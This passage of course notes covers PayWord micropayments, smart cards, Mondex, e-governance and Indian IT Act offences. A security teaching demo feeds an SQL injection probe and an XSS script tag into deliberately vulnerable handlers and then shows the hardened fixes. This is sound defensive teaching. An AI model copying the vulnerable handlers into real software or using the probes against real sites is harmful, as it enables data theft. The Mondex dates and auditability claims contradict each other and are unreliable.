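    Returns [w_0, w_1, ..., w_n]; w_0 is the public commitment, the rest stay secret."""
    w_n = seed if seed is not None else os.urandom(32)
    chain = [w_n]
    for _ in range(n):
        chain.append(h(chain[-1]))
    chain.reverse()
    return chain


class Vendor:
    """Vendor side. Accepts paywords offline; revealing w_i pays i units in total."""

    def __init__(self, commitment: bytes):
        self.last_word = commitment   # w_0, taken from the user's commitment
        self.last_index = 0

    def accept(self, w_i: bytes, i: int) -> bool:
        steps = i - self.last_index
        if steps <= 0:                # replay, or an index that does not advance
            return False
        x = w_i
        for _ in range(steps):        # h^(i - last)(w_i) must equal w_last
            x = h(x)
        if not hmac.compare_digest(x, self.last_word):
            return False              # forged word: nobody can invert h to mint one
        self.last_word, self.last_index = w_i, i
        return True

    def redemption_claim(self):
        """What the vendor later sends the broker: the highest payword and its index."""
        return self.last_word, self.last_index


class Broker:
    """Broker side. Holds each user's commitment w_0 (assumed registered out of band)
    and credits the vendor i units if h^i(w_i) == w_0."""

    def __init__(self):
        self.commitments = {}

    def register(self, user: str, w_0: bytes):
        self.commitments[user] = w_0

    def redeem(self, user: str, w_i: bytes, i: int) -> int:
        x = w_i
        for _ in range(i):
            x = h(x)
        return i if hmac.compare_digest(x, self.commitments[user]) else 0


def demo():
    chain = make_paywords(10, seed=b"\x01" * 32)   # constructed deterministic seed
    broker = Broker()
    broker.register("alice", chain[0])
    vendor = Vendor(chain[0])
    ok1 = vendor.accept(chain[1], 1)               # first article: 1 unit
    ok3 = vendor.accept(chain[3], 3)               # two more units in one step
    replay = vendor.accept(chain[3], 3)            # rejected: does not advance the chain
    forged = vendor.accept(os.urandom(32), 4)      # rejected: does not hash to w_3
    w, i = vendor.redemption_claim()
    credited = broker.redeem("alice", w, i)        # 3 units settled in one go
    return ok1, ok3, replay, forged, credited


if __name__ == "__main__":
    print(demo())   # (True, True, False, False, 3)
```

The vendor never contacts the broker per payment, which is what keeps per-transaction cost near zero; the trade-off is that the vendor extends credit to the user until redemption, so the broker's signed commitment and a spending cap per chain are what bound the vendor's loss.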

Advantages and risks –

With a micropayment system, many small transactions are summarised over a defined period of time and charged in one bill. For that reason, micropayments are applicable for businesses where even small costs for every single transaction would be inefficient. The main benefits for the customer in using micropayments are speed and flexibility. For the merchant, speed and acceptable transaction fees are very important. As the transactions involve small amounts, security does not have the highest priority; trust matters more than security. Users and merchants are more likely to use an insecure payment system from a trusted company than a secure payment system from an untrusted (unknown) company. Therefore the market entry barriers for new providers are high. Any company that wishes to enter this area must have plenty of capital and be willing to invest a lot before any return on investment, as it is extremely difficult for new payment systems to achieve widespread acceptance.

Payment options –

Micropayment providers offer various payment modules. Merchants need to sign up for an account with a chosen provider and decide on a module that suits their needs. The customer gets an option (or options) for how to pay for the desired content or goods.

The most common micropayment options are listed below.

Call2pay: payment by telephone. The customer is requested to call a toll number. The fee is set on a per-call basis for the desired payment amount.

Handypay: payment via mobile phone bill. The customer enters his or her cell phone number and receives an SMS with a TAN in order to confirm payment.

Ebank2pay: payment using online banking. The customer enters his or her online banking credentials and a TAN to transfer the payment amount. After making payment, the customer receives access to the purchased product.

Credit card: payment by credit card. The customer enters his or her credit card data and confirms the transaction. The transaction can optionally be carried out with the 3-D Secure method (Verified by Visa and MasterCard SecureCode).

Direct debit: payment by direct debit. The customer enters his or her bank ID and account number and confirms the direct debit authorization.

PayPal MicroPayments is a micropayment system that charges payments to users' PayPal accounts and allows transactions of less than US$12 to take place. As of 2013 the service is offered in select currencies only.

Micropayment Uses –

Publishing

Marketing

Software

Entertainment

Web Services

SMART CARD

A smart card, chip card or integrated circuit card (ICC) is any pocket-sized card with embedded integrated circuits. Smart cards are made of plastic, generally polyvinyl chloride, but sometimes polyethylene terephthalate based polyesters, acrylonitrile butadiene styrene or polycarbonate. Since April 2009 a Japanese company has manufactured reusable financial smart cards made from paper.

Smart cards can provide identification, authentication, data storage and application processing. Smart cards may provide strong security authentication for single sign-on (SSO) within large organizations.

A smart card is any pocket-sized card with embedded integrated circuits which can process data. This implies that it can receive input which is processed and delivered as an output.

What is a Smart Card?

- Standard credit card-sized, with a microchip embedded on it
- Two types: memory-only chips and microprocessor chips
- Can hold up to 32,000 bytes
- Newer smart cards have math co-processors to perform complex encryption routines quickly

In 1968, German inventors patented the combination of plastic cards with microchips.

Construction of Smart Cards –

Why Smart Cards –

Improve the convenience and security of any transaction

Provide tamper-proof storage of user and account identity

Provide vital components of system security

Protect against a full range of security threats

Advantages –

Flexibility

Security

Portability

Increasing data storage capacity

Reliability

Schematic overview of a smart card


Smart card Processing

Smart Card Applications –

Ticketless travel

Seoul bus system: 4M cards, 1B transactions since 1996

Planned for the SF Bay Area system

Authentication ID

Medical records

Ecash

Store loyalty programs

Personal profiles

Government

Licenses

Mall parking

Example Mondex


OVERVIEW OF MONDEX

Mondex is a smart card electronic cash system which was originally developed by National Westminster Bank in the United Kingdom and subsequently sold to MasterCard International. Mondex launched in a number of markets during the 1990s, expanding from an original trial in Swindon, UK, to Hong Kong, Guelph and New York. It was also trialled on several British university campuses from the late 1990s, including the University of Edinburgh, University of Exeter (between 1997 and 2001), University of York, University of Nottingham, Aston University and Sheffield Hallam University.

Direct transfer of electronic money between two cards

Transfer of electronic money over the Internet or telephone networks etc

Keep transaction records

Password protection and ldquolock cardrdquo functions

Portable balance finder to check balance

Support multiple currencies


ADVANTAGES

CONSUMER –

Convenience

Accessibility

On chip record of recent transactions

Home load

Internet purchases

MERCHANT –

Reliable-Off line payment

Higher security

Low transaction cost

Reduced cash handling

FINANCIAL INSTITUTION –

Strengthen customer relationships

New financial and commercial partnerships

Mondex is a concept for an electronic payment system that provides an alternative to cash, particularly small currency and coins (micro-payment). The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK.

In July 1996, on the initiative of NatWest and Midland Bank PLC, Mondex International Ltd was officially established by 17 major banks from North America, Asia/Pacific and Europe and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept, technology and brand. In the same year MasterCard International acquired 51% ownership of Mondex International and fully endorsed the Mondex technology architecture.

How does Mondex Protect Privacy –

Principles protected:

o limits for collecting personal information
o limits for using, disclosing and keeping personal information
o keeping personal information accurate
o safeguarding personal information

Limits for collecting personal information:

o loads from account
o deposits into account
o lost transactions

Limits for using, disclosing and keeping personal information:

o to safeguard deposits
o to reimburse for non-performance

Keeping personal information accurate:

o load and unload are online
o a rolling log of the last 10 transactions provides the exact spend and retailer name

Safeguarding personal information:

o firewalls in MULTOS between applications (ITSEC E6 designation)
o transaction data passed to the retailer is deliberately limited
o individual transaction data is not collected by banks; Mondex is an unaudited system


The design of a Mondex smart card allows end users to transfer funds electronically onto the card and then use the Mondex smart card to make purchases up to the total cash value held on the card. Mondex smart cards provide an electronic payment system using all the capabilities associated with smart card technology. The Mondex smart card can be a convenient alternative to cash.

Although the design was five years old at the time, the Mondex smart card was actually launched in 1995, two years before MasterCard assumed control of the technology.

The banks that currently support the Mondex smart card include National Bank of Canada, Scotiabank, Canada Trust, Bank of Montreal, Le Mouvement des caisses Desjardins and Toronto Dominion Bank. With so many respected lending institutions banking on the idea, the Mondex smart card is worth a closer look.

The Mondex smart card has the ability to make card-to-card transfers, which is not possible with standard credit or debit cards. When you use a credit/debit card to make a purchase, communication is required between the bank and your card. Mondex cards, however, contain an embedded microprocessor with sophisticated encryption methods and tamper-resistant hardware designed to protect them from attackers. The ability of the Mondex smart card to do offline transactions means it is less dependent on expensive network infrastructure, reducing transaction costs. Offline transactions may seem anonymous; however, they are actually recorded in the memory of the card's microprocessor and remain retrievable the next time the card is used at an ATM, or as soon as the retailer uploads transaction data to the bank computer.

A significant disadvantage of Mondex is that transactions aren't truly anonymous. Unlike pre-paid phone cards, which are also based on smart card technology, you can't purchase a Mondex card without revealing your identity. Each card has a unique identification number through which owners can easily be identified. Mondex smart cards have not been as successful as originally predicted. Customers have not been especially satisfied with the card and its services. Unlike a credit or debit card, your money may be lost forever if you should lose a Mondex smart card. Losing a Mondex card is just like losing a wallet full of cash. With a credit card you're protected against any loss exceeding $50. This protection is not currently available with a Mondex smart card.

According to Mondex, the smart card system is fully auditable: there is a log of the time, date, amount and participants of each transaction, which hampers the privacy of users. Technically, however, Mondex can't claim to be a fully auditable system. After a number of transactions, overflow can occur as a result of the limited memory in the Mondex smart cards. This means that significant data may be lost before Mondex is able to retrieve it. Critics say this loss of data is a critical design flaw, making it difficult for Mondex to reliably detect fraud.

While Mondex smart cards are not a hundred percent secure, they do possess the ability to tolerate minor fraud loss.

Mondex believes their electronic payment system is secure. They are convinced that critics who have voiced concern over security issues are mistaken and misinformed. Perhaps the use of a Mondex smart card depends on a personal level of trust.

E-GOVERNANCE

Although the term 'e-Governance' has gained currency in recent years, there is no standard definition of this term. Different governments and organizations define this term to suit their own aims and objectives. Sometimes the term 'e-government' is also used instead of 'e-Governance'.

Several dimensions and factors influence the definition of e-governance, or electronic governance. The word "electronic" in the term e-governance implies technology driven governance. E-governance is the application of information and communication technology (ICT) for delivering government services, exchange of information, communication transactions, and integration of various stand-alone systems and services between government-to-customer (G2C), government-to-business (G2B) and government-to-government (G2G), as well as back office processes and interactions within the entire government framework. Through e-governance, government services will be made available to citizens in a convenient, efficient and transparent manner. The three main target groups that can be distinguished in governance concepts are government, citizens and businesses/interest groups. In e-governance there are no distinct boundaries.

Generally four basic models are available: government-to-citizen (customer), government-to-employees, government-to-government and government-to-business.

Difference between E-Government and E-Governance

Both terms are often treated as the same; however, there is some difference between the two. E-government is the use of ICTs in public administration, combined with organizational change and new skills, to improve public services and democratic processes and to strengthen support to the public. The problem with this definition, if it is to be congruent with the definition of e-governance, is that there is no provision for governance of the ICTs themselves. As a matter of fact, the governance of ICTs most probably requires a substantial increase in regulation and policy-making capabilities, with all the expertise and opinion-shaping processes among the various social stakeholders of these concerns. So the perspective of e-governance is the use of technologies that both help governing and have to be governed. Public-Private Partnership (PPP) based e-governance projects are hugely successful in India. United Telecoms Limited, known as UTL, is a major player in India on PPP based e-governance projects. Each project had a mammoth state wide area network in these states.

E-governance is the future many countries are looking forward to for a corruption-free government. E-government is a one-way communication protocol, whereas e-governance is a two-way communication protocol. The essence of e-governance is to reach the beneficiary and ensure that the services intended for the desired individual have actually reached them. There should be an auto-response to support the essence of e-governance, whereby the Government realizes the efficacy of its governance. E-governance is by the governed, for the governed and of the governed.

Establishing the identity of the end beneficiary is a challenge in all citizen-centric services. Statistical information published by governments and world bodies does not always reveal the facts. The best form of e-governance cuts down on unwanted interference from too many layers while delivering governmental services. It depends on a good infrastructural setup, with the support of local processes and parameters, for governments to reach their citizens or end beneficiaries. Budgets for planning, development and growth can be derived from well laid out e-governance systems.

Why e-Governance?

E-Government can transform citizen service, provide access to information to empower citizens, enable their participation in government, and enhance citizens' economic and social opportunities, so that they can make better lives for themselves and for the next generation.

BASIC ARCHITECTURE

A suggested architecture for e-Governance is shown in the diagram, where it is illustrated that applications from various departments can be integrated together so as to be accessed by any terminal or computer from any other department, or from anywhere, through the network. This is because of the characteristics of CORBA: it is a location transparent, language independent, implementation independent and operating system independent architecture. The applications connected through CORBA/IIOP could be legacy applications wrapped to suit the CORBA specifications, any new Web application, or even a database environment using Oracle etc. Seamless interconnection, and thereby effective utility of the entire system of e-Governance, is possible if the middleware is designed to have the necessary services like Transactions, Database Management, Messaging and Naming.

Regarding security aspects, the CORBA Security standard is built around existing security specifications such as the Distributed Computing Environment (DCE), the Kerberos Protocol and the Generic Security Service (GSS) API. While these technologies are heavily weighted, Public Key Security with Secure Sockets Layer (SSL) is popular with Internet based transactions.

Types of Interactions in e-Governance

e-Governance facilitates interaction between different stakeholders in governance. These interactions may be described as follows:

G2G (Government to Government)

In this case, Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities. This kind of interaction is only within the sphere of government and can be both horizontal, i.e. between different government agencies as well as between different functional areas within an organization, or vertical, i.e. between national, provincial and local government agencies as well as between different levels within an organization. The primary objective is to increase efficiency, performance and output.

G2C (Government to Citizens)

In this case, an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services. This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other. It gives citizens the choice of when to interact with the government (e.g. 24 hours a day, 7 days a week), from where to interact with the government (e.g. a service centre, an unattended kiosk, or from one's home/workplace) and how to interact with the government (e.g. through internet, fax, telephone, email, face-to-face, etc.). The primary purpose is to make government citizen-friendly.

G2B (Government to Business)

Here, e-Governance tools are used to aid the business community (providers of goods and services) to seamlessly interact with the government. The objective is to cut red tape, save time, reduce operational costs and create a more transparent business environment when dealing with the government. The G2B initiatives can be transactional, such as in licensing, permits, procurement and revenue collection. They can also be promotional and facilitative, such as in trade, tourism and investment. These measures help to provide a congenial environment for businesses, enabling them to perform more efficiently.

G2E (Government to Employees)

Government is by far the biggest employer and, like any organization, it has to interact with its employees on a regular basis. This interaction is a two-way process between the organization and the employee. Use of ICT tools helps in making these interactions fast and efficient on the one hand, and increases satisfaction levels of employees on the other.

Difference between G2B and B2G

Government to business (G2B): refers to the conducting of transactions between government bodies and business via the internet.

Business to government (B2G): professional affairs conducted between companies and regional, municipal or federal governing bodies. B2G typically encompasses the determination and evaluation of proposals and the completion of contracts.

PUBLIC PRIVATE PARTNERSHIPS

• Agreement between Government and the Private Sector for the Provision of a Public Good or Service by the Latter
• Generally, but not always, involving:
  – Long Term Contracts
  – User Charges and/or Payments flowing between the Parties
  – Shared Investments, but Mainly Private
  – Risk Sharing by the Parties
• Must be a Partnership

A public-private partnership exists when public sector agencies (federal, state or local) join with private sector entities (companies, foundations, academic institutions or citizens) and enter into a business relationship to attain a commonly shared goal that also achieves the objectives of the individual partners.

Why do them?

• Fiscal Head Room
• As a Way of Financing the Project
• Separate Policy & Regulation from Operations
• Make the Good or Service Available
• Pay for Performance and Output
• Introduce Competition, For and In the Market

The Need to Set the Right Priorities

Four Basic Dimensions of P3

Although each is unique, all P3s include four basic characteristics:
• Shared goals
• Shared resources (time, money, expertise, people)
• Shared risks
• Shared benefits

Benefits:
• Expedited project completion
• Project cost savings
• Improved quality
• Use of private resources
• Access to new sources of private capital

Two Major Steps

• Crafting the Partnership
• Implementing the Partnership

Project Management: Six Distinct Phases

Genesis
• What's the need?
• What's driving the need (rationale)? Facility non-compliance, natural disaster, budget deficit
• Is there a need for a Public/Private Partnership?

Preliminary Project Definition
• Feasibility: is a Public/Private Partnership feasible, not only financially but practically? Can it be done?
• Market Research
• Economic/Financial Analysis
• Program, Budget and Schedule
• Risk Analysis

Plan and Test
• Final project definition: what is the best way to complete the project?
• Has the plan been thoroughly tested to assess market demand, public and stakeholder feedback, and economics?
• Master Schedule/Budget
• Political Climate
• Any potential "fatal flaws" that could derail the project?

Procurement and Contracting
• How do you choose and contract with the best-value private partner?
• What's the best delivery method? Design-Bid-Build, Design-Build, Finance-Design-Build
• What do current statutes allow?
• Procurement Approach: Sole Source, RFP, Low Bid
• Risk Allocation between Public and Private Partners
• Structuring of Contract/Risks and Rewards

Implement
• Environmental
• Design
• Permitting
• Construction
• Commissioning and Administration

Operate
• Startup
• Monitoring
• Assessment
• Enhancement
• Contract Modifications
• Contract Renegotiations

READINESS IN E-GOVERNANCE

A high level of readiness to develop and implement e-government services is a prerequisite for a high-performing and innovative public sector that delivers integrated services, making life easier for citizens and businesses. E-government readiness is therefore a significant indicator of whether a country is prepared to harvest the efficiencies gained from ICT-enabled public administrations.

The UN's e-government readiness index is a combined indicator of the supply of, potential demand for, and maturity of e-government services. OECD member countries exhibit a high capacity to develop and implement e-government services. This is generally characterized by an extensive broadband infrastructure, a repository of electronic information on government laws and policies (including links to archived information and downloadable forms), and a high level of comfort with ICT among citizens and businesses. Countries with the highest readiness index also tend to have a large number of transactional and e-commerce features on their government websites. As noted by the UN in its 2008 e-government survey, the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (e.g. the accessibility and penetration of the electronic infrastructure) and strategies (e.g. the online provision of services). Each country has two main government websites: one that is informative and another that is a gateway for e-government services. In addition, citizens and businesses are able to access many services and complete many transactions online. However, similar levels of e-government readiness can also result from different strategic approaches.

Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries' readiness to harness the potential efficiencies of ICT. Broadband penetration has increased dramatically in most OECD member countries in the past five years, as countries have made significant investments in their telecommunications infrastructure.

SECURITY ISSUES IN E-GOVERNANCE

1. INTRODUCTION

The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions. In particular, the networking potential offered by the Internet and related technologies has the potential to transform the structures and operation of government.

The effective management of information security is a key factor, as the willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have in the data security of the service.

2. INFORMATION SECURITY

A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens.

The process approach for an information security management system (ISMS) encourages its users to emphasize the importance of:
• understanding an organization's information security requirements and the need to establish policy and objectives for information security;
• implementing and operating controls to manage an organization's information security risks in the context of the organization's overall business risks;
• monitoring and reviewing the performance and effectiveness of the ISMS;
• continual improvement based on objective measurement.

Data security requires a set of security requirements:
• Authentication: the capability to identify who is using the services (a person or a software program); the process of verifying that you are who you say you are.
• Authorization: the capability to grant access rights to resources; the process of verifying that someone has the rights to do what she is trying to do.
• Confidentiality: the capability to prevent unauthorized access to information.
• Integrity: the capability to prevent unauthorized modification of information, ensuring that information can be relied upon and is accurate and complete.
• Traceability: the capability to chronologically interrelate any transaction to the person or system that performed the action, in a way that is verifiable.
• Non-repudiation: the capability to prevent a person or system that took part in an event or action from denying or challenging their participation in the event.
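Two of the requirements above, integrity and traceability, can be shown in working code with a keyed, hash-chained audit log. This is an added example, not code from these notes or from any e-Government system: every entry records who did what to which resource and when, and binds itself to the previous entry's digest, so an edit, deletion or reordering of any entry changes every later digest and is caught by the verifier. The key, actors, resources and timestamps are constructed; because the key is a shared secret held by the verifier, the log provides integrity and traceability but not non-repudiation, which would require each actor to sign with a key only they hold.

```python
"""Hash-chained, keyed audit log for integrity and traceability (constructed example).

Each entry's digest is an HMAC over the previous digest plus the entry's own
fields, so the verifier can detect any modification, deletion or reordering.
The shared key gives integrity and traceability only; non-repudiation would
need per-actor digital signatures. All actors and events below are constructed.
"""
import hashlib
import hmac
import json
from typing import List, Optional

KEY = b"constructed-demo-key"   # assumption: a verifier-held secret, not an actor's key
GENESIS = "0" * 64              # previous-digest value for the first entry


def _digest(prev: str, body: dict) -> str:
    """HMAC-SHA256 over the previous digest and a canonical encoding of the entry."""
    canonical = json.dumps(body, sort_keys=True, separators=(",", ":"))
    return hmac.new(KEY, (prev + canonical).encode(), hashlib.sha256).hexdigest()


def append(log: List[dict], actor: str, action: str, resource: str, ts: int) -> dict:
    """Record that `actor` performed `action` on `resource` at time `ts`."""
    prev = log[-1]["digest"] if log else GENESIS
    entry = {"seq": len(log), "ts": ts, "actor": actor,
             "action": action, "resource": resource}
    digest = _digest(prev, entry)          # computed before the digest field exists
    entry["digest"] = digest
    log.append(entry)
    return entry


def verify(log: List[dict]) -> Optional[int]:
    """Return None if the chain is intact, else the index of the first bad entry."""
    prev = GENESIS
    for i, entry in enumerate(log):
        body = {k: v for k, v in entry.items() if k != "digest"}
        if entry["seq"] != i or not hmac.compare_digest(_digest(prev, body), entry["digest"]):
            return i
        prev = entry["digest"]
    return None


def trace(log: List[dict], resource: str) -> List[str]:
    """Chronological list of actors who touched `resource` (traceability)."""
    return [e["actor"] for e in sorted(log, key=lambda e: e["ts"]) if e["resource"] == resource]


def demo() -> dict:
    log: List[dict] = []
    append(log, "clerk-17", "read", "record/4711", 1000)
    append(log, "clerk-17", "update", "record/4711", 1005)
    append(log, "auditor-2", "read", "record/4711", 1010)

    tampered = [dict(e) for e in log]
    tampered[1]["actor"] = "clerk-99"      # attempt to shift blame for the update
    deleted = log[:1] + log[2:]            # attempt to hide that the update happened

    return {
        "intact": verify(log),             # None: untouched chain verifies
        "tampered_at": verify(tampered),   # 1: altered entry no longer matches its digest
        "deleted_at": verify(deleted),     # 1: gap breaks both seq and the chain
        "who": trace(log, "record/4711"),
    }


if __name__ == "__main__":
    print(demo())
```

The verifier checks both the sequence number and the digest, so removing an entry is detected even if the attacker recomputes nothing, and `hmac.compare_digest` avoids leaking digest bytes through timing.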

Examples of organizational and technical measures to prevent unauthorized access and processing are:
• Protecting premises, equipment and systems software, including input-output units.
• Protecting software applications used to process personal data.
• Preventing unauthorized access to personal data during transmission thereof, including transmission via telecommunication means and networks.
• Ensuring effective methods of blocking, destruction, erasure or anonymization of personal data.
• Enabling subsequent determination of when individual personal data were entered into a filing system, used or otherwise processed, and of the person responsible, for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data.

Although trusted security and privacy measures constitute a crucial success factor for e-Government, this has not yet been addressed: as the UN 2012 Survey shows, only 20% of national portals clearly indicate the presence of security features. Europe is leading, with 44 countries displaying secure links on their national websites, but the survey does not consider regional and local websites, nor the many decentralized public organization web portals.

3. INFORMATION SECURITY THREATS

Services provided by e-Government to citizens, enterprises, public officers, government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats. Detailed examples exist of cyber attacks using techniques like packet sniffers, probes, malware, internet infrastructure attacks, denial of service attacks, remote-to-local attacks and user-to-root attacks. The successful adoption of an ISMS is important to protect information assets, allowing an organization to:
• achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis;
• maintain a structured and comprehensive framework for identifying and assessing information security risks, selecting and applying applicable controls, and measuring and improving their effectiveness;
• continually improve its control environment;
• effectively achieve legal and regulatory compliance.

There are simple and well-known web application vulnerabilities that could be avoided, but e-Government websites are still vulnerable. A research work found 816 e-Government web sites from 212 different countries to be vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection. An SQL injection attack can compromise data integrity, while XSS is a vulnerability which attackers may exploit to steal users' information.
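The two vulnerability classes just named are easiest to understand side by side with their fixes. The following is an added example, not code from these notes or from any of the surveyed portals: a constructed citizen-lookup handler backed by an in-memory SQLite table, written once the way the vulnerable sites do it (query text built by string formatting, user input echoed into HTML) and once hardened (a parameterised query and output encoding). The table, column names, sample records and test inputs are all constructed.

```python
"""Vulnerable versus hardened handling of a citizen lookup (constructed example).

An in-memory SQLite table stands in for a portal database. The vulnerable
functions build SQL by string formatting and echo input into HTML unescaped;
the hardened ones bind parameters and encode output. Everything is constructed.
"""
import html
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed table with two records; the 'ssn' column is the data we must not leak."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE citizen (id INTEGER PRIMARY KEY, name TEXT, ssn TEXT)")
    conn.executemany("INSERT INTO citizen (name, ssn) VALUES (?, ?)",
                     [("Alice", "111-11-1111"), ("Bob", "222-22-2222")])
    return conn


# --- SQL injection: vulnerable form concatenates input into the query text -------
def lookup_vulnerable(conn: sqlite3.Connection, name: str) -> list:
    query = f"SELECT name, ssn FROM citizen WHERE name = '{name}'"
    return conn.execute(query).fetchall()


# --- hardened form: the driver binds the value; it can never become SQL syntax ----
def lookup_hardened(conn: sqlite3.Connection, name: str) -> list:
    return conn.execute("SELECT name, ssn FROM citizen WHERE name = ?", (name,)).fetchall()


# --- XSS: vulnerable form places user-controlled text straight into the page ------
def render_vulnerable(name: str) -> str:
    return f"<p>Results for {name}</p>"


# --- hardened form: HTML metacharacters are encoded before reaching the browser ---
def render_hardened(name: str) -> str:
    return f"<p>Results for {html.escape(name, quote=True)}</p>"


def contains_live_script(page: str) -> bool:
    """Crude detector used only to show whether a rendered page still carries a live tag."""
    return "<script" in page.lower()


def demo() -> dict:
    conn = make_db()
    # Constructed test inputs: a value that closes the SQL string literal, and one
    # carrying markup. No real endpoint is involved.
    sql_probe = "x' OR '1'='1"
    html_probe = "<script>alert(1)</script>"
    return {
        "vuln_rows": len(lookup_vulnerable(conn, sql_probe)),   # every record comes back
        "hard_rows": len(lookup_hardened(conn, sql_probe)),     # no name equals the probe
        "vuln_script": contains_live_script(render_vulnerable(html_probe)),
        "hard_script": contains_live_script(render_hardened(html_probe)),
    }


if __name__ == "__main__":
    print(demo())
```

The lesson is structural rather than about any one string: with bound parameters the database never parses user data as SQL, and with output encoding the browser never parses user data as HTML, so the two defences hold regardless of what the input looks like.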

Specific security measures like firewalls, intrusion detection software, encryption and secure networks must be defined, designed and implemented for government agencies to provide the appropriate levels of security. But information security must also take into consideration the people and processes that rely on the systems. Employees with daily access to e-Government systems must be trained in cybersecurity, and this aspect must become part of their job. A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies.

CYBER CRIME AND LAWS

The expression 'Crime' is defined as an act which subjects the doer to legal punishment, or any offence against morality or social order, or any unjust or shameful act. "Offence" is defined in the Code of Criminal Procedure to mean an act or omission made punishable by any law for the time being in force.

Cyber Crime is emerging as a serious threat. Worldwide, governments, police departments and intelligence units have started to react.

Cyber Crime is a term used to broadly describe criminal activity in which computers or computer networks are a tool, a target or a place of criminal activity, and it includes everything from electronic cracking to denial of service attacks. It is also used to include traditional crimes in which computers or networks are used to enable the illicit activity.

Computer crime mainly consists of unauthorized access to computer systems, data alteration, data destruction and theft of intellectual property. Cyber crime in the context of national security may involve hacking, traditional espionage, or information warfare and related activities.

Pornography, threatening email, assuming someone's identity, sexual harassment, defamation, spam and phishing are some examples where computers are used to commit crime, whereas viruses, worms, industrial espionage, software piracy and hacking are examples where computers become the target of crime.

Cyber Crime Variants

Hacking

Hacking is a crime which entails cracking systems and gaining unauthorized access to the data stored in them. Hacking witnessed a 37 per cent increase this year.

Cyber Squatting

Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune. This is an issue that has not been tackled in the IT ACT 2000.

Phishing is just one of the many frauds on the Internet trying to fool people into parting with their money. Phishing refers to the receipt of unsolicited emails by customers of financial institutions, requesting them to enter their username, password or other personal information to access their account for some reason. The fraudster then has access to the customer's online bank account and to the funds contained in that account.

Cyber Stalking is the use of the Internet or other electronic means to stalk someone. This term is used interchangeably with online harassment and online abuse. Stalking generally involves harassing or threatening behaviour that an individual engages in repeatedly, such as following a person, appearing at a person's home or place of business, making harassing phone calls, leaving written messages or objects, or vandalizing a person's property.

Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access to private personal and financial information from the public for the purpose of financial reward. The term is a combination of "voice" and "phishing". Vishing exploits the public's trust in landline telephone services.

Vishing is typically used to steal credit card numbers or other information used in identity theft schemes from individuals.

A rapidly growing online user base:
• 121 Million Internet Users
• 65 Million Active Internet Users, up by 28% from 51 million in 2010
• 50 Million users shop online on Ecommerce and Online Shopping Sites
• 46+ Million Social Network Users
• 346 million mobile users had subscribed to Data Packages

CYBER LAW

(1) Whoever, with the intent to cause or knowing that he is likely to cause wrongful loss or damage to the public or any person, destroys or deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means, commits hacking.

(2) Whoever commits hacking shall be punished with imprisonment up to three years, or with fine which may extend up to two lakh rupees, or with both.

Whoever, without permission of the owner of the computer:
• secures access;
• downloads, copies or extracts any data, computer database or any information;
• introduces or causes to be introduced any virus or contaminant;
• disrupts or causes disruption;
• denies or causes denial of access to any person;
• provides any assistance to any person to facilitate access;
• charges the services availed of by a person to the account of another person by tampering with or manipulating any computer, computer system or computer network;
shall be liable to pay damages by way of compensation not exceeding one crore rupees to the person so affected.

Section 43

• Destroys, deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means.
• Steals, conceals, destroys or alters, or causes any person to steal, conceal, destroy or alter, any computer source code used for a computer resource with an intention to cause damage.

"If any person, dishonestly or fraudulently, does any act referred to in section 43, he shall be punishable with imprisonment for a term which may extend to three years or with fine which may extend to five lakh rupees or with both." [S66]

S 66A - Punishment for sending offensive messages through communication service, etc.

Any person who sends, by means of a computer resource or a communication device:
• any information that is grossly offensive or has menacing character; or
• any information which he knows to be false, but for the purpose of causing annoyance, inconvenience, danger, obstruction, insult, injury, criminal intimidation, enmity, hatred or ill will, persistently makes use of such computer resource or communication device; or
• any electronic mail or electronic mail message for the purpose of causing annoyance or inconvenience, or to deceive or to mislead the addressee or recipient about the origin of such messages;
shall be punishable with imprisonment for a term which may extend to three years and with fine.

S 66C - Punishment for identity theft

"Whoever, fraudulently or dishonestly, makes use of the electronic signature, password or any other unique identification feature of any other person, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to rupees one lakh."

S 66D - Punishment for cheating by personation by using computer resource

"Whoever, by means of any communication device or computer resource, cheats by personation, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to one lakh rupees."

S 66E - Punishment for violation of privacy

"Whoever, intentionally or knowingly, captures, publishes or transmits the image of a private area of any person without his or her consent, under circumstances violating the privacy of that person, shall be punished with imprisonment which may extend to three years or with fine not exceeding two lakh rupees, or with both."

S 67A - Punishment for publishing or transmitting material containing a sexually explicit act, etc., in electronic form

"Whoever publishes or transmits, or causes to be published or transmitted, in the electronic form any material which contains a sexually explicit act or conduct shall be punished on first conviction with imprisonment of either description for a term which may extend to five years and with fine which may extend to ten lakh rupees."

S 67C - Preservation and retention of information by intermediaries

"(1) An intermediary shall preserve and retain such information as may be specified, for such duration and in such manner and format as the Central Government may prescribe.

(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub-section (1) shall be punished with imprisonment for a term which may extend to three years and shall also be liable to fine."

IT ACT

